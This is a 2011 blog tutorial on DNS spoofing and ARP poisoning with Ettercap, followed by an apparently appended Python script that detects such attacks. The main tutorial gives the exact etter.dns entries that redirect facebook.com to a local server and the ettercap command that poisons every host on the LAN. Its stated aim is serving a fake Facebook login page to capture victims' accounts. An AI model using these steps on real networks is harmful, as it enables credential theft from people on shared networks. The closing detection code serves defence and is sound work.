Sunday, October 30, 2011

Hi guys. I've been away for a long time because of a new job, but I'm back. I would like to share one of my school projects with you guys. It is DNS spoofing with Ettercap, which fools people on the LAN: when they access a certain website, their requests are redirected to your local website or whatever website you want. Wait! It only works in the LAN. I haven't tested it on 2 LANs connected via a router. In this tutorial, I set up a Facebook phishing page on my web server, so when people go to facebook.com, they get my Facebook page. When they log in, I get their accounts.


What is Ettercap?
Ettercap is a network monitoring and security auditing tool, also known as a good suite for man-in-the-middle attacks on a LAN. It is open source software for Unix and Windows platforms. It supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis.




DNS spoofing

The following steps show how to use Ettercap for DNS spoofing with the DNS_Spoof plug-in on a Local Area Network with a local website running. This Ettercap plug-in is only one potential way to pull off DNS spoofing, and it only works if the attacker is on the same subnet. These instructions are only for Linux-based Ettercap.
1. Download Link: click here

2. Install Ettercap on Linux or use the Backtrack 3 Live CD. (I use a Backtrack 3 Live USB.)
3. Open a terminal window and type ifconfig to check your network cards and settings.
4. Modify the Ettercap DNS spoof plug-in file, which can be found in the following location:
/usr/local/share/ettercap/etter.dns
5. Use the nano command to edit the file from the terminal, or use any GUI text editor.
6. This is an example of what is inside the file:
############################################################################
# #
# ettercap -- etter.dns -- host file for phantom plugin #
# #
# Copyright (C) 2001 ALoR <alor@users.sourceforge.net> #
# NaGA <crwm@freemail.it> #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# Sample hosts file for phantom plugin #
# #
# the format is : #
# #
# xxx.xxx.xxx.xxx<TAB>www.myhostname.com #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the facebook example) #
###########################################################################
# facebook sucks;)
# redirect it to my assbook

192.168.1.1 A facebook.com
192.168.1.1 A *.facebook.com
192.168.1.1 PTR http://www.facebook.com


NOTE: After the IP, separate the fields like this: 192.168.1.1[tab button]+[space button]A[tab button]+[space button]facebook.com

7. In the above example, facebook.com is redirected to the local website when victims' computers make a DNS request for facebook.com. Save the file and close it.
8. Use the following command to do ARP poisoning and start DNS spoofing for all computers in the Network:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //
9. For more details about these switches, type ettercap -help
10. This will activate the ARP poisoning and DNS spoofing. Press Ctrl+C to stop the attack.
11. When the victim visits http://www.facebook.com, they are redirected to the local website.
12. By using this method, you can set up the phishing page and redirect the victims to your page.
13. Happy Hacking. Cheers...



Thank you.
Don't forget to say thanks and post your comments.
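Seen from the defender's side, the procedure above leaves two traces on a victim machine: ARP poisoning makes two IP addresses (typically the gateway and another host) share one MAC in the neighbour table, and the spoofed DNS answer maps a public name to a LAN address. The following is an added example, not part of the original post, that checks for both; the sample data is constructed, and the function names and LOCAL_SUFFIXES list are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample data (not from the original post): `ip neigh` style
# output and (name, answer) pairs as a resolver log might record them.
NEIGH_SAMPLE = """\
192.168.1.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
192.168.1.23 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.1.40 dev eth0 lladdr 3c:52:82:11:22:33 REACHABLE
192.168.1.77 dev eth0  FAILED
"""
DNS_SAMPLE = [
    ("facebook.com", "192.168.1.23"),
    ("www.example.org", "93.184.216.34"),
    ("printer.lan", "192.168.1.50"),
]
LOCAL_SUFFIXES = (".lan", ".local", ".home.arpa")  # assumed internal zones

NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-fA-F:]{17})\b")


def arp_conflicts(neigh_text):
    """Return {mac: [ips]} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(set)
    for line in neigh_text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # entries without lladdr (FAILED/INCOMPLETE) are skipped
            by_mac[m.group(2).lower()].add(m.group(1))
    return {mac: sorted(ips, key=ipaddress.ip_address)
            for mac, ips in by_mac.items() if len(ips) > 1}


def suspicious_answers(answers, local_suffixes=LOCAL_SUFFIXES):
    """Return (name, ip) pairs where a public name resolved into private space."""
    hits = []
    for name, ip in answers:
        name = name.rstrip(".").lower()
        internal = name.endswith(local_suffixes) or "." not in name
        addr = ipaddress.ip_address(ip)
        if not internal and (addr.is_private or addr.is_loopback):
            hits.append((name, ip))
    return hits


if __name__ == "__main__":
    for mac, ips in arp_conflicts(NEIGH_SAMPLE).items():
        print(f"ARP: {mac} claimed by {', '.join(ips)}")
    for name, ip in suspicious_answers(DNS_SAMPLE):
        print(f"DNS: {name} -> {ip} (private address for a public name)")
```

A shared MAC is not proof on its own, since routers with several addresses and proxy ARP produce it legitimately; the strong signal is the default gateway's IP sharing a MAC with an ordinary host, especially together with a private-address answer for a public name.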
